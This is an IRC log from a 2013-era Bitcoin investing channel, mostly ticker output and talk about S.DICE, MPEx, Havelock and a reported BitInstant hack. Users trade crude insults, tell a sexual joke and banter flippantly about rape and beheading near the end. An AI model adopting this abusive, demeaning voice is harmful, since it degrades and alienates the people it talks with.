i understand how it works Mar 05 19:32:30 i use the system Mar 05 19:32:33 have multiple bets in Mar 05 19:32:33 jurov hmmm Mar 05 19:32:36 one of which is fucked up Mar 05 19:32:41 binary options would be better Mar 05 19:32:43 simple suggestion Mar 05 19:32:44 eat a dick Mar 05 19:32:45 also Mar 05 19:32:46 you know this is not in any way a bad idea. Mar 05 19:32:54 im right Mar 05 19:32:55 u guys are wrong Mar 05 19:32:57 suck a duck Mar 05 19:32:57 period Mar 05 19:32:59 ban this toolbox Mar 05 19:33:03 plz Mar 05 19:33:04 ok Mar 05 19:33:13 first my money gets eaten by ur website Mar 05 19:33:15 JimRogers when you're done being riught read the comments too Mar 05 19:33:17 and you blame someone else Mar 05 19:33:30 now u wanna ban me cuz i make as olid suggestion Mar 05 19:33:31 no it doesn't Mar 05 19:33:54 you had some site payout to a different betting site... all bets are off, check with the sender as NOTHING is in the blockchain Mar 05 19:34:15 kakobrekla tried to help you, now kindly stfu or change the attitude. Mar 05 19:34:43 dude i sent an email Mar 05 19:34:45 The blockchain is public and everyone can clearly see no transaction was ever sent to your bet's address. Mar 05 19:34:47 i no longer blame you guys Mar 05 19:34:50 we get signal Mar 05 19:34:51 and then i get ban threatedn Mar 05 19:34:53 i don't give a fuck Mar 05 19:35:17 yawn Mar 05 19:35:23 pigeons show him btcjam Mar 05 19:35:44 no im waiting for them to use twitter bootstrap Mar 05 19:36:12 bootstrap shpould randomize defaults or something Mar 05 19:36:27 no, they should just use old tripod and myspace looks as default Mar 05 19:37:15 [BTCTC] [BTC-TRADING-PT] 91 @ 0.1619 = 14.7329 BTC [-] Mar 05 19:41:11 ;;ticker Mar 05 19:41:12 BTCUSD ticker | Best bid: 40.08000, Best ask: 40.10000, Bid-ask spread: 0.02000, Last trade: 40.10000, 24 hour volume: 83684.96974197, 24 hour low: 36.00000, 24 hour high: 40.64625, 24 hour vwap: 38.73271 Mar 05 19:45:33 guys, can i um maybe get a bit more functionality out of BitBet?! Mar 05 19:45:42 like, don't change anything, but it should be better ok? Mar 05 19:45:56 http://www.xkcd.com/1181/ rmunroe must be somewhere around hiding Mar 05 19:46:41 sooo.. i my mind, the weighting has nothing to do with if a bet is "binary" meaning like "over/under" or "true/false" ... the weighting is just to encourage early betting. Mar 05 19:46:46 ThickAsThieves http://polimedia.us/dtng/c/src/136246895277.jpg Mar 05 19:46:50 does that halp ? Mar 05 19:47:01 mod6 he's hung up on the itrade model. Mar 05 19:47:30 yeah, im re-reading that blog - he seems to fall into this category Mar 05 19:48:45 working much better now, thx mp Mar 05 19:49:30 where do the bitcoins come out though? Mar 05 19:49:44 wherever you put them in Mar 05 19:49:48 careful tho, runny. Mar 05 19:50:24 gonna have to talk to micon about this then Mar 05 19:58:03 [HAVELOCK] [SDICE] 4 @ 0.581 = 2.324 BTC [+] Mar 05 19:58:05 [HAVELOCK] [SDICE] 15 @ 0.5809 = 8.7135 BTC [-] Mar 05 19:58:06 [HAVELOCK] [SDICE] 1 @ 0.58 BTC [-] Mar 05 19:58:06 [HAVELOCK] [SDICE] 5 @ 0.56 = 2.8 BTC [-] Mar 05 19:58:07 [HAVELOCK] [SDICE] 7 @ 0.555 = 3.885 BTC [-] Mar 05 19:58:09 [HAVELOCK] [SDICE] 5 @ 0.55 = 2.75 BTC [-] Mar 05 19:58:45 my god mp bring MPEX into the 21st century with some better charts and graphics...it's like looking at a 70s movie :) Mar 05 19:59:04 ZedsterX got sierra ? Mar 05 19:59:26 ZedsterX, shhh, that's opportunity ;) Mar 05 19:59:30 obv not if i am bitching and shouldn't be Mar 05 19:59:45 http://mpex.co/faq.html#11 Mar 05 19:59:49 oh jurov sorry Mar 05 19:59:50 can get a sierracharts plugin Mar 05 20:00:34 ya know i probably read that 4 times but the ADD just let it slip right on by Mar 05 20:00:58 i will checkin it out...and i was just yankin your chain Mar 05 20:02:22 the thing is most everything is so dense Mar 05 20:02:26 people just naturally skip over bits Mar 05 20:04:21 lol, even if yes, that's honour :DD Mar 05 20:04:34 lol Mar 05 20:04:43 rofl Mar 05 20:04:58 in his mind Mar 05 20:05:11 juuusssst playing here Mar 05 20:05:37 lol Mar 05 20:05:46 ;;estimate Mar 05 20:05:47 Next difficulty estimate | 4746628.77934 based on data since last change | 4836522.12241 based on data for last three days Mar 05 20:05:47 informationally dense you bucnha trolls! :D Mar 05 20:06:22 ok now i know he called me troll Mar 05 20:07:43 to quote the girl, Mar 05 20:07:44 *MPOE-PR* it's almost like he's a made up caricature for an irc play Mar 05 20:07:44 *MPOE-PR* (also i imagine everything he says in no pok voice) Mar 05 20:07:44 ahahaha no pok hiar! Mar 05 20:07:44 *MPOE-PR* this gay ass website ate my bitcoin i tell you! no send to, no (quit) ... (enter) send to at all! Mar 05 20:10:24 i do remember looking at the sierra thing....i turned out to be way too incompetent to figure it out Mar 05 20:10:38 ZedsterX jurov also made some charts Mar 05 20:10:42 live.coinbr.com Mar 05 20:10:56 yeah i use his :) Mar 05 20:11:27 ZedsterX whats so hard about sierra Mar 05 20:11:57 but really no matter which chart i look at DICE is diving :P Mar 05 20:12:54 o is it ? Mar 05 20:12:57 !ticker m s.dice Mar 05 20:12:59 [MPEX:S.DICE] 1D: 0.005 / 0.0059661 / 0.006225 (233405 shares, 1,392.52 BTC), 7D: 0.0048 / 0.00589302 / 0.0063799 (532527 shares, 3,138.20 BTC), 30D: 0.0042 / 0.00593929 / 0.007395 (6854653 shares, 40,711.83 BTC) Mar 05 20:13:00 yest was rebounding Mar 05 20:13:10 kakobrekla: probably nothing sir i am just unsure how to use it Mar 05 20:13:21 which part Mar 05 20:14:06 i have download the file...i am assuming its command line? Mar 05 20:14:11 "most everyone" prolly got trolled by that "bitcoin's moar expensive, s.dice revenue must go down" and other nonarguments Mar 05 20:14:30 ZedsterX, do you have sierra chart installed? Mar 05 20:14:34 jurov prolly. also, some cycles are natural. Mar 05 20:14:41 i'd be much more worried if it just marched up Mar 05 20:15:03 ZedsterX, you can run the exe with a double click, you done need to go to cmd. Mar 05 20:15:09 you dont* Mar 05 20:15:19 one sec Mar 05 20:16:00 oops i see what i did...my bad gimme a minute Mar 05 20:18:14 [BTCTC] [ASICMINER-PT] 5 @ 0.65 = 3.25 BTC [-] Mar 05 20:26:03 [HAVELOCK] [SDICE] 10 @ 0.555 = 5.55 BTC [+] Mar 05 20:27:02 [HAVELOCK] [SDICE] 10 @ 0.55 = 5.5 BTC [-] Mar 05 20:30:17 http://bitbet.us/bet/288/bitcoin-mining-distribution/ Mar 05 20:30:20 that's kinda interesting Mar 05 20:30:36 http://bitbet.us/bet/289/unknowns-come-to-dominate-bitcoin-mining/ actually that one too Mar 05 20:34:39 that unknowns one has problems. simply because blockchain can't identify a pool and all of a sudden it's unknown. Mar 05 20:35:22 i mean, the largest pool could change their IPs just to manipulate the bet at the last second Mar 05 20:35:57 think they would ? Mar 05 20:36:14 and it wouldn't be a last second thing Mar 05 20:36:20 they'd have to mine with the new ip, for 4 days Mar 05 20:36:31 you could possibly game with ddos Mar 05 20:36:45 blockchain.info goes longer than 4 days misidentifying pools Mar 05 20:36:54 like months Mar 05 20:37:12 which is like decades in real time Mar 05 20:37:21 game with hashpower.com Mar 05 20:37:23 its just so people will start a who is the mystery miner thread Mar 05 20:37:30 pigeons im not saying it's like, gospel. Mar 05 20:37:42 identifying anyting in bitcoin is an exercise in weighing tits. Mar 05 20:38:04 lol @ expression Mar 05 20:38:30 so, i got email from coinbr customer that wanted to buy just one call and ignored the "1 BTC initial funding required" Mar 05 20:38:30 :p Mar 05 20:38:37 he's prolly coing here soon Mar 05 20:38:44 lol jurov's awas Mar 05 20:41:47 "you can estimate the health of a system by counting how often tail appears in history" Mar 05 20:42:55 dub http://www.youtube.com/watch?v=CnmMNdiCz_s re listeria Mar 05 20:46:15 ;;ticker Mar 05 20:46:15 BTCUSD ticker | Best bid: 39.16990, Best ask: 39.20000, Bid-ask spread: 0.03010, Last trade: 39.16990, 24 hour volume: 80328.52310126, 24 hour low: 36.00000, 24 hour high: 40.64625, 24 hour vwap: 38.96510 Mar 05 20:46:27 mircea_popescu: thought you didnt have flash Mar 05 20:46:36 ;;asks 42 Mar 05 20:46:41 There are currently 11784.191 bitcoins offered at or under 42.0 USD, worth 483266.145112 USD in total. | Data vintage: 0.0023 seconds Mar 05 20:46:46 ;;bids 37 Mar 05 20:46:47 There are currently 12980.381 bitcoins demanded at or over 37.0 USD, worth 492895.066255 USD in total. | Data vintage: 5.8729 seconds Mar 05 20:46:52 i don't. Mar 05 20:46:58 ;;bids 38 Mar 05 20:46:58 There are currently 7685.7263 bitcoins demanded at or over 38.0 USD, worth 295264.074332 USD in total. | Data vintage: 17.3235 seconds Mar 05 20:47:24 mircea_popescu doesn't support flash lol Mar 05 20:47:31 mpex Mar 05 20:47:40 now with actionscript Mar 05 20:48:09 i don't support apple either. Mar 05 20:48:15 "mpex. only available on rooted boxes" Mar 05 20:49:03 mpex available only in romania Mar 05 20:49:29 actually im not even sure it is availavle in romania Mar 05 20:50:16 mpex the facebook of stock exchanges Mar 05 20:50:48 needs moar blue Mar 05 20:51:35 deadterra still hasnt paid sdice divs... Mar 05 20:52:57 he is too busy rolling in money Mar 05 20:53:07 !ticker m S.DICE Mar 05 20:53:09 [MPEX:S.DICE] 1D: 0.005 / 0.00596607 / 0.006225 (230050 shares, 1,372.50 BTC), 7D: 0.0048 / 0.00588869 / 0.0063799 (527527 shares, 3,106.45 BTC), 30D: 0.0042 / 0.00593892 / 0.007395 (6852829 shares, 40,698.42 BTC) Mar 05 20:53:19 haha Mar 05 20:54:38 [MPEX] [S.MPOE] 1300000 @ 0.00075 = 975 BTC [+] Mar 05 20:55:04 [HAVELOCK] [SDICE] 8 @ 0.555 = 4.44 BTC [+] Mar 05 20:55:58 thats a lot of mpoe Mar 05 20:56:03 [HAVELOCK] [SDICE] 9 @ 0.55 = 4.95 BTC [-] Mar 05 20:56:13 yay Mar 05 20:57:03 [HAVELOCK] [SDICE] 10 @ 0.53 = 5.3 BTC [-] Mar 05 20:59:59 Thick: As far as I know it always take DeaDTerra a few days. Mar 05 21:00:10 My passthroughs 2 weeks I think. Mar 05 21:00:14 pigeons: hows the arbitrage working for you? Mar 05 21:00:15 say* Mar 05 21:00:26 topace: arbitrage? Mar 05 21:00:35 Is MPEx arbitrage ready? Mar 05 21:00:41 with havelock Mar 05 21:00:43 mpex->havelock is available Mar 05 21:00:44 yes Mar 05 21:00:58 topace: thanks for the quick service, it will work out fine as long as dice doesnt spike up before i get deposited with mpex Mar 05 21:01:03 [HAVELOCK] [SDICE] 10 @ 0.52 = 5.2 BTC [-] Mar 05 21:01:32 just testing with small amounts and of course there wasnt a large amount of liquidity Mar 05 21:01:37 great feature thanks Mar 05 21:02:02 [HAVELOCK] [SDICE] 1 @ 0.51 BTC [-] Mar 05 21:02:04 [HAVELOCK] [SDICE] 9 @ 0.505 = 4.545 BTC [-] Mar 05 21:03:11 i didn't even know pigeons had an account Mar 05 21:03:26 this chan delivers. Mar 05 21:04:03 [HAVELOCK] [SDICE] 1 @ 0.505 BTC [-] Mar 05 21:05:09 i have an account with everyone, even btcjam Mar 05 21:05:32 you dont with biitbet or bit4x Mar 05 21:05:47 oh yeah Mar 05 21:05:54 maybe later Mar 05 21:06:03 [HAVELOCK] [SDICE] 2 @ 0.5001 = 1.0002 BTC [-] Mar 05 21:06:23 esp for bb Mar 05 21:06:35 muhahaha bratislava hackerspace thinks about providing discount accomodation to amir/genjix... if he'll do some dish washing Mar 05 21:06:50 pigeons i'm laughing at you right now for the btcjam account Mar 05 21:07:00 no out loud though, that would be rude Mar 05 21:07:03 [HAVELOCK] [SDICE] 13 @ 0.50000001 = 6.5 BTC [-] Mar 05 21:07:05 [HAVELOCK] [SDICE] 6 @ 0.495 = 2.97 BTC [-] Mar 05 21:07:06 [HAVELOCK] [SDICE] 6 @ 0.49 = 2.94 BTC [-] Mar 05 21:07:18 :) Mar 05 21:07:32 jurov le linque ? Mar 05 21:07:37 What's up with S.DICE? Mar 05 21:07:43 Why is everyone selling? Mar 05 21:07:48 dunno Mar 05 21:07:54 prolly to invest in asicminer Mar 05 21:07:56 mircea_popescu: just chat in #progressbar.sk Mar 05 21:07:57 and primeasic Mar 05 21:08:01 I would guess it's due to BTC's high price in USD. Maybe people want to cash that money out. Mar 05 21:08:10 ^ that Mar 05 21:08:36 Only thing I can see. S.DICE is still great as usual. Mar 05 21:08:37 don't they know they should hold btc? :P Mar 05 21:09:03 [HAVELOCK] [SDICE] 19 @ 0.49 = 9.31 BTC [-] Mar 05 21:09:05 [HAVELOCK] [SDICE] 16 @ 0.4874999 = 7.8 BTC [-] Mar 05 21:09:05 if they really include amir in some vip gallery, i'll definitely link ya :P Mar 05 21:09:06 [HAVELOCK] [SDICE] 6 @ 0.48 = 2.88 BTC [-] Mar 05 21:09:08 They should lend the BTC to me instead Mar 05 21:09:21 Namworld lol s.dice divs are about 2.5x neh ? Mar 05 21:09:31 yeah Mar 05 21:09:37 lol ok Mar 05 21:09:44 so basically, get 300 btc at 1, buy s.dice, Mar 05 21:09:49 sounds like a plan, i should be doing this Mar 05 21:10:03 [HAVELOCK] [SDICE] 19 @ 0.48 = 9.12 BTC [-] Mar 05 21:10:26 ;;ticker Mar 05 21:10:26 BTCUSD ticker | Best bid: 39.89000, Best ask: 39.90000, Bid-ask spread: 0.01000, Last trade: 39.90000, 24 hour volume: 81687.70130217, 24 hour low: 36.00012, 24 hour high: 40.64625, 24 hour vwap: 39.02022 Mar 05 21:10:32 its interesting how the pts amplify movements. when it went to 6x on mpex it went to 7x on pt. Mar 05 21:10:42 now that it retraced to 5x on mpex its at 4x on pt Mar 05 21:10:48 it depends on which Mar 05 21:10:59 the bitfunder one is dampened instead Mar 05 21:11:04 well iiutc havelock has like 50% of the pt float Mar 05 21:11:31 less precision on the pts, since 100 = 1 on havelock at least Mar 05 21:12:07 so ? they still take 8 decimals or no ? Mar 05 21:12:09 and btct doesnt goout as many satoshi Mar 05 21:12:17 Namworld: what will you be doing with the borrowed btc? Mar 05 21:12:39 pigeons what do you need such precision for? Mar 05 21:12:53 i'm trying to spread fud, at least let someone agree first Mar 05 21:12:59 I place bids for assets I want. Mar 05 21:13:10 I always need capital to place bids. Mar 05 21:13:19 Mostly trade BTC denominated assets Mar 05 21:13:25 Silicon Valley Bank, a company that provides financial services to emerging growth companies, will be holding deposits of bitcoin and dollars for Coinlab. However, they will not be providing insurance for these deposits. Mar 05 21:14:02 ahahaah WHAT ? Mar 05 21:14:06 can they do this even ? Mar 05 21:14:10 i think i'd rather trust magic the gathering online exchange Mar 05 21:14:19 in yurp you legally have to insure Mar 05 21:14:28 not something you can contract away Mar 05 21:14:29 Here's my public portfolio pizzaman: https://docs.google.com/spreadsheet/pub?key=0AvwwyRGyc1WgdGFKVlAtZVAzOGNqS1Brd05MUlFlT2c Mar 05 21:14:33 the more i read, the less i like Mar 05 21:14:35 GSDPT dividend paid :) Mar 05 21:14:41 mircea_popescu: what do you mean 50% of pt float ? Mar 05 21:14:41 hurra Mar 05 21:14:52 we have 100% of the shares issued and trading on havelock Mar 05 21:15:04 [HAVELOCK] [SDICE] 10 @ 0.47 = 4.7 BTC [-] Mar 05 21:15:09 topace of the total s.dice shares held by all pts Mar 05 21:15:15 i tink you have about half on havelock Mar 05 21:15:16 oh! Mar 05 21:15:19 yea probably Mar 05 21:15:31 Namworld: pretty spreadsheet Mar 05 21:15:33 we're at S.DICE x 1`125`000 Mar 05 21:15:42 I love making spreadsheets Mar 05 21:15:52 It auto-updates Mar 05 21:15:59 jcpham that quote belongs on the forum Mar 05 21:16:07 i make love on sheets with spreaded stuff Mar 05 21:16:20 at least the private section. I have to republish for the public spreadsheet regularly. Mar 05 21:16:41 thanks for the unneeded information, kakobrekla Mar 05 21:16:58 kakobreklaaa do you know the aspirin joke ? Mar 05 21:17:10 dunno Mar 05 21:17:17 GSDPT currently has 1,4 Mill shares Mar 05 21:17:22 big tits girl goes to cunny doctor Mar 05 21:17:22 lol Mar 05 21:17:25 why I guest... Mar 05 21:17:35 "is it true that aspirin can be used as an anticonceptional ?" Mar 05 21:17:46 there we go Mar 05 21:17:52 "uhhh... i guess if you hold it between your knees it might" Mar 05 21:17:58 "so then... what, you just sit on it ?" Mar 05 21:18:24 ok so 1.125 on hl, 1.4mn on btctc, who's got bf ? Mar 05 21:18:38 sorry source Mar 05 21:18:40 http://www.forbes.com/sites/saranyakapur/2013/03/05/bitcoin-ready-to-go-mainstream-with-first-u-s-exchange/ Mar 05 21:18:56 I got BF Mar 05 21:19:12 I have 1,4 mill spread out between BF,BTCT and private deals Mar 05 21:19:13 DeaDTerra: you'll get used to it. try spending some time in jail Mar 05 21:19:18 most of the shares are on BF Mar 05 21:19:28 hahah lol :P Mar 05 21:19:53 I lost $14 getting my GSDPT pushed a few hours before the dividends... =P Mar 05 21:20:03 [HAVELOCK] [SDICE] 10 @ 0.5 = 5 BTC [+] Mar 05 21:20:12 Well on the plus side, I saved on getting cheap shares from Bitfunder. Mar 05 21:20:14 http://blog.bitinstant.com/blog/2013/3/4/events-of-friday-bitinstant-back-online.html Mar 05 21:20:18 seems bitinstant is back Mar 05 21:20:37 (11:17) < mircea_popescu> "so then... what, you just sit on it ?" << lol Mar 05 21:20:57 im actually amazed at how quickly havelocks sdice passthru adjusts to match mpex Mar 05 21:21:05 congrats! success! you're funds are safe! "Overall, due to major choke points and redundancies in our system, the hacker was only able to walk away with $12,480 USD in BTC, and send them in 3 installments of 333 BTC to bitcoin addresses. " Mar 05 21:21:11 topace people must be watchin'. and since you made it easy... Mar 05 21:21:19 wait what ? Mar 05 21:21:22 haxed ?! Mar 05 21:21:29 Could not connect to remote server Mar 05 21:21:31 jesus. Mar 05 21:21:43 bitinstant got haxx0red ? Mar 05 21:21:48 "Welcome to MPEx The only Bitcoin service that has never been hacked. Established August 2011." Mar 05 21:22:11 mircea_popescu: havelock hasnt been hacked Mar 05 21:22:12 :p Mar 05 21:22:16 nor has canadianbitcoins Mar 05 21:22:18 shh! Mar 05 21:22:38 im obviously only comparing to the other ones that were hacked Mar 05 21:22:49 hehe Mar 05 21:22:54 lol Mar 05 21:23:33 pigeons their site actually load for you ? Mar 05 21:23:47 http://blogs.barrons.com/emergingmarketsdaily/2013/03/05/meet-bitcoin-the-worlds-best-performing-currency/ Mar 05 21:23:51 safer putting "yet" on the end of the sentence Mar 05 21:23:51 yes Mar 05 21:24:10 pigeons times out for me Mar 05 21:25:02 http://pastebin.com/uTKTTzwk Mar 05 21:25:24 ty kind sir Mar 05 21:25:57 "None of your personal or transactional information has been leaked. We keep all that data offline to protect everyones privacy." Mar 05 21:26:00 wait... how does that work ?! Mar 05 21:26:42 oh you were expecting honesty about a hack? Mar 05 21:26:58 The attacker contacted our domain registrar at Site5 posing as me and using a very similar email address as mine, they did so by proxying through a network owned by a haulage company in the UK whom I suspect are innocent victims the same as ourselves. Armed with knowledge of my place of birth and mother's maiden name alone (both facts easy to locate on the public record) they convinced Site5 staff to add their email ad Mar 05 21:26:58 dress to the account and make it the primary login (this prevented us from deleting it from the account). Mar 05 21:27:03 wait so ... Mar 05 21:27:08 omg wtf. Mar 05 21:27:22 After changing this info and locking the attacker out, overnight he was able to revert my changes and point our website somewhere else. Site5 is denying any damages, but we suspect this was partly their fault. Mar 05 21:27:33 dude, and they sat on it ?! Mar 05 21:27:35 omfg. Mar 05 21:27:58 these hacks always coincide with "system maintenance" Mar 05 21:27:59 a. this is why mpex model has to take over bitcoinworkd ; Mar 05 21:28:07 b. fucking hell people need to learn to report. the good and the bad. Mar 05 21:29:42 hello, how are everyone's assets performing? Mar 05 21:30:04 my ass is set and performing well Mar 05 21:30:08 lol Mar 05 21:30:10 in a sitting position Mar 05 21:30:16 fuck Mar 05 21:30:20 this sounds so jurovy Mar 05 21:32:15 bitcoin businesses just shouldnt host their sites in places like that... you need my iris scan to change anything on any of my accounts at the data center, and even if they had access t my account, they couldnt do anything with it, as the physical boxes belong to me and no settings can be changed from the datacenter admin staff without having my own system's root passwords Mar 05 21:32:48 ill just pop your eye Mar 05 21:32:51 and use a wrench. Mar 05 21:33:03 they say their system can detect a live eye form a dead one Mar 05 21:33:12 wrench is for psswd, not for the eye Mar 05 21:33:26 fine ill take the head and keep it warm Mar 05 21:33:31 haha Mar 05 21:35:03 [HAVELOCK] [SDICE] 2 @ 0.469 = 0.938 BTC [-] Mar 05 21:35:04 would be one life better for you if they had worse eye decetion system Mar 05 21:36:26 detection* Mar 05 21:38:02 [HAVELOCK] [SDICE] 2 @ 0.469 = 0.938 BTC [-] Mar 05 21:38:03 [HAVELOCK] [SDICE] 45 @ 0.4681 = 21.0645 BTC [-] Mar 05 21:40:53 ;;bc,stats Mar 05 21:40:56 Current Blocks: 224416 | Current Difficulty: 4367876.000842196 | Next Difficulty At Block: 225791 | Next Difficulty In: 1375 blocks | Next Difficulty In About: 1 week, 2 days, 2 hours, 32 minutes, and 34 seconds | Next Difficulty Estimate: 4771119.08352 | Estimated Percent Change: 9.23202 Mar 05 21:41:25 [MPEX] [S.DICE] 1 @ 0.00499969 BTC [-] Mar 05 21:41:30 [MPEX] [S.DICE] 157 @ 0.00485 = 0.7615 BTC [-] Mar 05 21:42:42 Goodbye S.DICE price Mar 05 21:43:27 S.DICE price has left the channel. Mar 05 21:43:35 funny that a 2.5% paying asset isn't good enough now Mar 05 21:43:36 drop some more, i wanna buy back in Mar 05 21:43:55 [BTCTC] [S.DICE-PT] 840 @ 0.0055 = 4.62 BTC [-] Mar 05 21:44:36 Thick: if many want to withdraw to have BTC ready... Mar 05 21:44:54 might mean many are expecting the current BTC price to be a bubble and want to be ready to sell Mar 05 21:45:00 I know I do. Mar 05 21:45:15 You can see very low amount of asks... Mar 05 21:45:19 i think btc dropping anything notable is far off Mar 05 21:45:27 [MPEX] [S.MPOE] 13729 @ 0.00074448 = 10.221 BTC [-] Mar 05 21:45:29 [MPEX] [S.MPOE] 4889 @ 0.00074218 = 3.6285 BTC [-] Mar 05 21:45:33 [MPEX] [S.MPOE] 5932 @ 0.00074217 = 4.4026 BTC [-] Mar 05 21:45:39 way to jinx it ThickAsThieves Mar 05 21:45:52 :/ Mar 05 21:46:11 i just think people will be panic buying for a bit Mar 05 21:46:30 ;;ticker Mar 05 21:46:31 BTCUSD ticker | Best bid: 39.51020, Best ask: 39.58506, Bid-ask spread: 0.07486, Last trade: 39.51020, 24 hour volume: 82491.79614755, 24 hour low: 36.00012, 24 hour high: 40.64625, 24 hour vwap: 39.07380 Mar 05 21:46:59 !ticker m ^OIX Mar 05 21:47:01 [MPEX:^OIX] 1D: 0 / 0 / 0 (0 shares, 0 BTC), 7D: 29.08490939 / 41.20198681 / 46.0855546 (no shares, 6,242.04 BTC), 30D: 0 / 0 / 0 (0 shares, 0 BTC) Mar 05 21:47:12 I hope we reach 100 USD/BTC Mar 05 21:47:21 since its virgin territory on one really knows what to do Mar 05 21:48:24 Namworld: when? Mar 05 21:48:24 ;;asks 41 Mar 05 21:48:29 There are currently 7344.3475 bitcoins offered at or under 41.0 USD, worth 299081.1159 USD in total. | Data vintage: 0.0019 seconds Mar 05 21:48:48 in the near future as in next 2 months Mar 05 21:48:58 Price would certainly crash soon afterward Mar 05 21:49:17 yeah too fast...this is too fast Mar 05 21:49:56 http://bitcoincharts.com/charts/mtgoxUSD#igWeeklyztgSza1gEMAzm1g10za2gEMAzm2g21zv Mar 05 21:50:03 I love parabolic curves Mar 05 21:50:18 hehe Mar 05 21:52:01 waves not parabolas... Mar 05 21:52:16 ;;market sell 100000 Mar 05 21:52:21 A market order to sell 100000 bitcoins right now would net 2846687.2846 USD and would take the last price down to 16.0000 USD, resulting in an average price of 28.4669 USD/BTC. | Data vintage: 0.0103 seconds Mar 05 21:52:48 there still isnt enough depth to resist manipulation Mar 05 21:52:54 i dedicate http://trilema.com/2013/the-events-of-failday/ to pigeons Mar 05 21:52:59 who halped. Mar 05 21:55:52 thestringpuller: i was wondering just that last night how big a chunk it would take Mar 05 21:55:59 [BTCTC] [B.YABMC] 1 @ 0.00667 BTC [+] Mar 05 21:57:13 [BTCTC] [B.YABMC] 1 @ 0.00667 BTC [+] Mar 05 21:57:15 [BTCTC] [B.YABMC] 15 @ 0.00666 = 0.0999 BTC [-] Mar 05 21:58:02 hehThe URL that you are attempting to access is a potential security risk. Trend Micro OfficeScan has blocked this URL in keeping with network security policy. Mar 05 21:58:10 URL: http://eligius.st/ Mar 05 21:58:25 the first time trend has ever been useful Mar 05 21:59:20 lol Mar 05 22:02:56 http://crypto-trade.com/ April 1 is always a great day to launch Mar 05 22:03:57 this is the guy with the vircurex ipo right ? Mar 05 22:04:36 [BTCTC] [GSDPT] 9 @ 0.00609 = 0.0548 BTC [+] Mar 05 22:05:08 this is the guy who runs the esecurity assets which supposedly run a ddos prevention service Mar 05 22:08:39 a Mar 05 22:10:42 but what if i want to send an order to buttplox Mar 05 22:10:50 it looks like BF & BTCT designs had a baby together Mar 05 22:11:07 (the crypto-trade design) Mar 05 22:11:30 Lyspooner now that i dunno Mar 05 22:11:39 gotta join #bitcoin-buttploxets mebbe Mar 05 22:12:02 Lyspooner, we run our own buttplox : mpex.coinbr.com Mar 05 22:13:00 and there are more Mar 05 22:13:13 that will surface if needed Mar 05 22:16:37 ;;google “he was holding a really big gun“ Mar 05 22:16:38 BFG - Television Tropes & Idioms: ; Down With Big Gun: ; Stormers holding back their big guns | Southern HemisphereNews ...: Mar 05 22:19:02 lol, rape with BFG... quite an overkill Mar 05 22:19:39 im the overking of overmetaphors. Mar 05 22:19:44 overtly. Mar 05 22:24:07 [MPEX] [S.MPOE] 18158 @ 0.00074708 = 13.5655 BTC [+] Mar 05 22:24:09 [MPEX] [S.MPOE] 816842 @ 0.00075 = 612.6315 BTC [+] Mar 05 22:29:41 [MPEX] [S.DICE] 23 @ 0.0052 = 0.1196 BTC [+] Mar 05 22:30:13 S.DICE price joined the channel. Mar 05 22:31:12 816842 @ 0.00075 = 612.6315 wat Mar 05 22:31:24 there was another for much more earlier Mar 05 22:31:30 yes Mar 05 22:31:55 i don't understand what's happening here anymore Mar 05 22:32:03 abandon any hope Mar 05 22:32:15 or rather, i was thinking i understand and i was wriong Mar 05 22:32:25 I don't know how I understand some of this stuff. Mar 05 22:32:38 Sometimes if I take a step back and look at it, I'm like 'wat?' Mar 05 22:33:36 "I got mah GPUs mining LTC" :step back: 'wat?' Mar 05 22:34:47 at least you got nice heating. that's what matters. Mar 05 22:34:49 s.dice moar like s.deuce Mar 05 22:36:18 well it's good news in any event, helps support the book. Mar 05 22:36:22 pigeons: that crypto-trade is by Neotrix the eSecurity assets on btct/ltc Mar 05 22:36:53 being in HK I believe its highly illegal there too :) Mar 05 22:37:10 seeing as eCurrencies are very illegal in china/hk Mar 05 22:39:03 they are ? Mar 05 22:39:33 yup Mar 05 22:39:41 there are actual laws aginst eCurrencies in china/hk Mar 05 22:39:49 yeah explicitly illegal now Mar 05 22:39:58 neat Mar 05 22:40:08 china MUST maintain control. Mar 05 22:40:11 e-mooncakes Mar 05 22:40:16 in their eyes. :) Mar 05 22:40:21 laws are always fun when they chnge Mar 05 22:41:02 so wait. bitcoin is a. illegal in china ; b. on some senator's deathlist in the us ; c. sorta neutral in europe. Mar 05 22:41:14 i am guessing you guise have picked a life of crime ? Mar 05 22:41:27 i like morality Mar 05 22:41:43 a moral criminal Mar 05 22:41:49 this sounds like a tv show. Mar 05 22:41:53 its moral until Luke-Jr says its wrong Mar 05 22:42:02 laws that are moral and laws that are cultoral have different meaning to me Mar 05 22:42:26 *cultural Mar 05 22:42:43 china's new law is cultural and has nothing to do with morality Mar 05 22:43:16 and you get to pick ? Mar 05 22:43:23 apparently so Mar 05 22:43:27 or so far Mar 05 22:43:40 you know i can bringa pretty good set of arguments that rape is cultural not moral in this scheme Mar 05 22:44:02 we're getting dangerous close to the idea of right vs. wrong Mar 05 22:44:06 but he likes rape Mar 05 22:44:39 rape can be either Mar 05 22:44:41 i just like pestering people. Mar 05 22:44:56 that's the beauty of it, it is all arbitrary Mar 05 22:45:07 im just dicking around, since i sound like a tits but mean dick. Mar 05 22:45:46 situationally speaking the act of rape can be amoraaly wrong or culturally wrong or both Mar 05 22:45:51 not my decison Mar 05 22:45:54 so you get to decide ? Mar 05 22:46:07 well what the fuck am i doing here, am i beheading this rapist guy or not ? Mar 05 22:46:13 everyone else can decide as long as i'm not raped Mar 05 22:46:30 once i'm raped then i have to decide Mar 05 22:46:43 wait, what ?! Mar 05 22:47:03 continiue Mar 05 22:47:06 what's this, victim discrimination ?! Mar 05 22:47:32 ;;ticker Mar 05 22:47:32 BTCUSD ticker | Best bid: 39.79000, Best ask: 39.99400, Bid-ask spread: 0.20400, Last trade: 39.99400, 24 hour volume: 83112.64777389, 24 hour low: 36.00012, 24 hour high: 40.64625, 24 hour vwap: 39.12581 Mar 05 22:47:32 i forgot what we were talking about Mar 05 22:47:43 lol Mar 05 22:48:35 the point i was making is that rape is strictly prohibited Mar 05 22:49:36 financially or physically? :P Mar 05 22:50:41 remember beign raped is punishable by death in places Mar 05 22:51:49 some places discriminate for the victim, some for the perpetrator Mar 05 22:51:54 some even inssit they marry. Mar 05 22:53:12 and those countries usually hit the woman for cheating if married Mar 05 22:53:52 21:51.52 ( mircea_popescu ) some even inssit they marry. Mar 05 22:53:57 useful stuff Mar 05 22:54:31 Ukto: there was a case in dubai a while back where the wife/gf of a guy who cheated on her was jailed because she caught them having sex and three people in a room where sex is happening is a crime Mar 05 22:56:07 that dumbass law btw is the reason i never went to dubai. Mar 05 22:56:25 what the fuck, i've not had pairsex in years Mar 05 22:57:21 yeah fuck that place Mar 05 22:59:09 the mandatory 4 years in jail for drugs 